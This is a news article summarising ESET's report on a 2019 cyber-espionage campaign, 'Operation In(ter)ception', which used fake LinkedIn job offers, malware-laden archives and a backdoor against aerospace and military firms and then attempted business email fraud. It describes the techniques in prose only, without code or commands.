Targeted Cyber-Espionage Campaign Hits Aerospace and Military Sectors
Cybersecurity researchers have unveiled a sophisticated cyber-espionage campaign that specifically targets aerospace and military organizations across Europe and the Middle East. This initiative, termed “Operation In(ter)ception,” reportedly aimed to infiltrate and monitor key personnel within these firms while also attempting to extract financial gains through deceptive tactics.
According to a recent report by ESET, a cybersecurity firm, this campaign unfolded between September and December 2019, employing sophisticated malware techniques. The main objective, as articulated by ESET researchers, was espionage. However, in certain instances, attackers went a step further, aiming to monetize their access via Business Email Compromise (BEC) attacks, attempting to redirect funds from victim companies to accounts controlled by the intruders.
The modus operandi of the attackers involved employing social engineering tactics to lure employees from targeted organizations with fake job offers. Using LinkedIn’s messaging feature, they posed as HR representatives from reputable aerospace and defense enterprises, such as Collins Aerospace and General Dynamics. Once contact was established, malicious files disguised as job-related documents were introduced into communications.
These deceptive files, often encapsulated within RAR archives sent directly through messages or emails from impersonated LinkedIn accounts, were advertised as containing essential information—such as salary details—related to the purported job openings. In reality, these files executed a sequence of commands through Windows’ Command Prompt, which included copying the Windows Management Instrumentation command-line tool to obscure locations, renaming it to evade detection, and creating scheduled tasks for executing remote scripts.
Upon gaining initial access to the targeted companies, the attackers deployed a custom malware downloader that fetched a more advanced payload—a C++ backdoor capable of receiving commands from an attacker-controlled server. This backdoor could execute predefined actions and exfiltrate the gathered information in a compressed RAR format.
ESET’s investigation into this campaign raised suspicions about the involvement of the Lazarus Group, a well-known hacking entity believed to operate on behalf of the North Korean government. The group has a long-standing history of cyber-attacks aimed at funding the country’s prohibited weapons and missile projects. Their tactics may have included initial access through phishing and use of malware as a persistence mechanism, as outlined in the MITRE ATT&CK framework.
In addition to data exfiltration, evidence suggested that some attackers sought financial gain by exploiting compromised email accounts to manipulate business transactions. They registered deceptive domains similar to those of compromised firms, directing fraudulent communications to customers in an attempt to redirect payments to accounts under their control. However, their efforts were thwarted when one targeted customer noticed the anomalies and contacted the victim company.
This incident underscores the ongoing threat posed by advanced phishing tactics and the essential need for heightened vigilance within the aerospace and military sectors. The methodologies employed were not only technically sophisticated but also relied heavily on social engineering, re-emphasizing the critical role human error plays in cybersecurity vulnerabilities.
ESET’s findings serve as a stark reminder for business owners to remain vigilant against such engineered threats, ensuring employees are trained to recognize and report suspicious communications. As cyber threats evolve, so too must the strategies employed to mitigate these risks.
